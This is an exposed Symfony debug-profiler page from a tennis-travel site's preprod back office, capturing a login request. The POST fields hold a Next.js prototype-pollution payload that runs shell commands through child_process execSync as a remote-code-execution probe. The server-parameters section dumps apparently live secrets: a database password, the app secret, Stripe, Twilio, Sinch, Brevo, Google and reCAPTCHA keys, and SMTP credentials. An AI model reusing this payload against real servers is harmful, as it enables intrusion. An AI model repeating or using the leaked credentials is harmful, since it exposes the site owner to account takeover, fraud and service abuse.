https://backoffice.racket-trip.eu/connexion

ErrorController

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"error_controller"
_stopwatch_token
"d66f55"
exception
Symfony\Component\HttpKernel\Exception\BadRequestHttpException {#188
  #message: "The key "_username" must be a string, "NULL" given."
  #code: 0
  #file: "/var/www/preprod/racket-trip/vendor/symfony/security-http/Authenticator/FormLoginAuthenticator.php"
  #line: 149
  -statusCode: 400
  -headers: []
  trace: {
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Authenticator/FormLoginAuthenticator.php:149 {
      Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator->getCredentials(Request $request): array …
      › if (!\is_string($credentials['username']) && (!\is_object($credentials['username']) || !method_exists($credentials['username'], '__toString'))) {    throw new BadRequestHttpException(sprintf('The key "%s" must be a string, "%s" given.', $this->options['username_parameter'], \gettype($credentials['username'])));}
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Authenticator/FormLoginAuthenticator.php:84 {
      Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator->authenticate(Request $request): Passport …
      › {    $credentials = $this->getCredentials($request);arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php:63 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator->authenticate(Request $request): PassportInterface …
      › $startTime = microtime(true);$this->passport = $this->authenticator->authenticate($request);$this->duration = microtime(true) - $startTime;
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:181 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › // get the passport from the Authenticator$passport = $authenticator->authenticate($request);arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:161 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
      arguments: {
        $authenticator: Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator {#187 …}
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:141 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
      arguments: {
        $authenticators: [ …1]
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:40 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:66 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › 
      › $this->authenticationManagerListener->authenticate($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:49 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event) …
      › try {    $ret = $this->listener->authenticate($event);} catch (LazyResponseException $e) {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
      Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event) …
      › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:60 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->__invoke(RequestEvent $event) …
      › foreach ($listeners as $listener) {    $listener($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:77 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners) …
      › 
      ›     $listener($event);} else {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/security-http/Firewall.php:92 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
        $listeners: Generator {#170 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:118 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#411 …}
        }
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#411 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …12]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
        $eventName: "kernel.request"
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#289 …}
        $eventName: "kernel.request"
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
        $type: 1
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
        $type: 1
        $catch: true
      }
    }
    /var/www/preprod/racket-trip/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#2 …}
      }
    }
    /var/www/preprod/racket-trip/vendor/autoload_runtime.php:35 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /var/www/preprod/racket-trip/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/var/www/preprod/racket-trip/vendor/autoload_runtime.php"
      }
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#300 …9}

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
connection
"keep-alive"
content-length
"748"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundaryc3c17441f37a4d9b"
cookie
"PHPSESSID=lejf6m15hb7sqeip2tt08far74; sf_redirect=%7B%22token%22%3A%2223b03c%22%2C%22route%22%3A%22admin_dashboard%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CBackoffice%5C%5CAdminHomeController%22%2C%22method%22%3A%22dashboard%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fpreprod%5C%2Fracket-trip%5C%2Fsrc%5C%2FController%5C%2FBackoffice%5C%2FAdminHomeController.php%22%2C%22line%22%3A30%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"backoffice.racket-trip.eu"
next-action
"x"
user-agent
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
x-nextjs-request-id
"5b1c6e0f"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Sat, 12 Sep 2026 15:46:10 GMT"
vary
"Accept"
x-debug-exception
"The%20key%20%22_username%22%20must%20be%20a%20string%2C%20%22NULL%22%20given."
x-debug-exception-file
"%2Fvar%2Fwww%2Fpreprod%2Fracket-trip%2Fvendor%2Fsymfony%2Fsecurity-http%2FAuthenticator%2FFormLoginAuthenticator.php:149"
x-debug-token
"2ebac9"

Cookies

Request Cookies

Key Value
PHPSESSID
"lejf6m15hb7sqeip2tt08far74"
sf_redirect
"{"token":"23b03c","route":"admin_dashboard","method":"GET","controller":{"class":"App\\Controller\\Backoffice\\AdminHomeController","method":"dashboard","file":"\/var\/www\/preprod\/racket-trip\/src\/Controller\/Backoffice\/AdminHomeController.php","line":30},"status_code":302,"status_text":"Found"}"

Response Cookies

No response cookies

Session 2

Session Metadata

Key Value
Created
"Sat, 12 Sep 26 15:46:09 +0000"
Last used
"Sat, 12 Sep 26 15:46:09 +0000"
Lifetime
0

Session Attributes

Attribute Value
_security.backoffice.target_path
"https://backoffice.racket-trip.eu/"

Session Usage

2 Usages
Stateless check enabled
Usage
App\EventSubscriber\LocaleSubscriber:36
[
  [
    "file" => "/var/www/preprod/racket-trip/src/EventSubscriber/LocaleSubscriber.php"
    "line" => 36
    "function" => "get"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelRequest"
    "class" => "App\EventSubscriber\LocaleSubscriber"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/autoload_runtime.php"
    "line" => 35
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/public/index.php"
    "line" => 5
    "args" => [
      "/var/www/preprod/racket-trip/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:44
[
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
    "line" => 44
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-http/Authenticator/RememberMeAuthenticator.php"
    "line" => 65
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 110
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authenticator\RememberMeAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 34
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 40
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 38
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 25
    "function" => "supports"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 77
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/security-http/Firewall.php"
    "line" => 92
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/vendor/autoload_runtime.php"
    "line" => 35
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/var/www/preprod/racket-trip/public/index.php"
    "line" => 5
    "args" => [
      "/var/www/preprod/racket-trip/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
API_KEY_GOOGLE
"AIzaSyDlbNXT8UFkJUNivXKFV97ZOUyariVlM_w"
API_KEY_GOOGLE_BACK
"AIzaSyBOnq55jg9_Ievv3kw5_ERkGjafbhFwsHs"
APP_ENV
"dev"
APP_SECRET
"9f62b68979f513508ba481d54ef4ed80"
BREVO_API_KEY
"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"
CORS_ALLOW_ORIGIN
"^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL
"mysql://rackettrip:k7%SfQH1jG@127.0.0.1:3306/rackettrip"
DOMAIN
"racket-trip.eu"
EMAIL_RECEPTION
"racket.trip@gmail.com"
EMAIL_SENDER
"contact@racket-trip.eu"
FULL_URL
"https://racket-trip.eu"
MAILER_DSN
"smtp://api:e8f918a95ad8bc6a69eb11c18bc2909d@live.smtp.mailtrap.io:587"
MERCURE_COOKIE_DOMAIN
"racket-trip.eu"
MERCURE_COOKIE_PATH
"/hub-mercure"
MERCURE_JWT_SECRET
"!ChangeThisMercureHubJWTSecretKey!"
MERCURE_PUBLIC_URL
"https://racket-trip.eu/hub-mercure"
MERCURE_URL
"https://racket-trip.eu/hub-mercure"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=1"
PRO_LIST_ID
"4"
RECAPTCHA3_KEY
"6LfniDIqAAAAACeJa2YUJhmmvAsZ9XxaddwVurBr"
RECAPTCHA3_SECRET
"6LfniDIqAAAAAEIYYljAYY20rKo4sT-IxOb28Jku"
SENTRY_DSN
"https://0e7b334a7fc4f1d198ca8a311c42346e@o4507096205885440.ingest.de.sentry.io/4507096226529360"
SERVER_ENV
"preprod"
SINCH_API_TOKEN
"fafc954e162a4c679173dc23f2bf32cb"
SINCH_SERVICE_PLAN_ID
"a3dda74eee9d4f7fa71ddce385d4f5b1"
SINCH_VIRTUAL_NUMBER
"+12019790415"
STANDARD_MONTHLY
"price_1LOvvoAsHoLzqU7GmSApPtYf"
STANDARD_YEARLY
"price_1LOvvoAsHoLzqU7GY0kqfLJn"
STRIPE_PUBLIC_KEY
"pk_test_51JVCGMAsHoLzqU7GPd6JetuS7HAEhDwTpX4g0MPHL0gsFzJj7hjhI46thxq8yfTyChZJnaU6FEktITmWuEYCvm1P00Vvd5sT47"
STRIPE_SECRET_KEY
"sk_test_51JVCGMAsHoLzqU7GMARsl0tlIMHZzCV5vG1U5dwQuLogpNr8va1XwgxzOzLNpBEtusTfS92BlPaIeWzjBhABN6ze000Bzi7yr4"
STRIPE_WEBHOOK_SECRET_KEY
"whsec_Hz5wcoFuVVQWbaO7Pzh1Ba0Kx2Emy0Lo"
TRAINEE_LIST_ID
"5"
TWILIO_ACCOUNT_SID
"ACaf205cec0183a58ed3059836a758d0ee"
TWILIO_AUTH_TOKEN
"a3bd398df71e00b1d35b53d49f98d032"
TWILIO_PHONE_NUMBER
"+14387965854"
VIP_MONTHLY
"price_1LOvvGAsHoLzqU7G4oYDz7Tn"
VIP_YEARLY
"price_1LOvvGAsHoLzqU7Gk93dp2Xk"
WKHTMLTOIMAGE_PATH
"/usr/local/bin/wkhtmltoimage"
WKHTMLTOPDF_PATH
"/usr/local/bin/wkhtmltopdf"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"748"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryc3c17441f37a4d9b"
DOCUMENT_ROOT
"/var/www/preprod/racket-trip/public"
DOCUMENT_URI
"/index.php"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_CONNECTION
"keep-alive"
HTTP_CONTENT_LENGTH
"748"
HTTP_CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryc3c17441f37a4d9b"
HTTP_COOKIE
"PHPSESSID=lejf6m15hb7sqeip2tt08far74; sf_redirect=%7B%22token%22%3A%2223b03c%22%2C%22route%22%3A%22admin_dashboard%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CBackoffice%5C%5CAdminHomeController%22%2C%22method%22%3A%22dashboard%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fpreprod%5C%2Fracket-trip%5C%2Fsrc%5C%2FController%5C%2FBackoffice%5C%2FAdminHomeController.php%22%2C%22line%22%3A30%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"backoffice.racket-trip.eu"
HTTP_NEXT_ACTION
"x"
HTTP_USER_AGENT
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
HTTP_X_NEXTJS_REQUEST_ID
"5b1c6e0f"
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_STATUS
"200"
REMOTE_ADDR
"34.155.156.74"
REMOTE_PORT
"39036"
REMOTE_USER
""
REQUEST_METHOD
"GET"
REQUEST_SCHEME
"https"
REQUEST_TIME
1789227969
REQUEST_TIME_FLOAT
1789227969.9744
REQUEST_URI
"/connexion"
SCRIPT_FILENAME
"/var/www/preprod/racket-trip/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"206.189.52.64"
SERVER_NAME
"backoffice.racket-trip.eu"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.18.0"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,WKHTMLTOPDF_PATH,WKHTMLTOIMAGE_PATH,CORS_ALLOW_ORIGIN,MESSENGER_TRANSPORT_DSN,DATABASE_URL,MERCURE_URL,MERCURE_PUBLIC_URL,MERCURE_JWT_SECRET,MAILER_DSN,API_KEY_GOOGLE,API_KEY_GOOGLE_BACK,STRIPE_SECRET_KEY,STRIPE_PUBLIC_KEY,STRIPE_WEBHOOK_SECRET_KEY,STANDARD_MONTHLY,STANDARD_YEARLY,VIP_MONTHLY,VIP_YEARLY,MERCURE_COOKIE_PATH,MERCURE_COOKIE_DOMAIN,DOMAIN,FULL_URL,EMAIL_SENDER,EMAIL_RECEPTION,SERVER_ENV,RECAPTCHA3_KEY,RECAPTCHA3_SECRET,BREVO_API_KEY,PRO_LIST_ID,TRAINEE_LIST_ID,SENTRY_DSN,TWILIO_ACCOUNT_SID,TWILIO_AUTH_TOKEN,TWILIO_PHONE_NUMBER,SINCH_SERVICE_PLAN_ID,SINCH_API_TOKEN,SINCH_VIRTUAL_NUMBER"
USER
"www-data"

Parent Request

Return to parent request (token = d0a212)

Key Value
_controller
"App\Controller\Backoffice\AdminAccountController::login"
_firewall_context
"security.firewall.map.context.backoffice"
_redirected
true
_remove_csp_headers
true
_route
"admin_login"
_route_params
[]
_security_firewall_run
"_security_backoffice"
_stopwatch_token
"b25b16"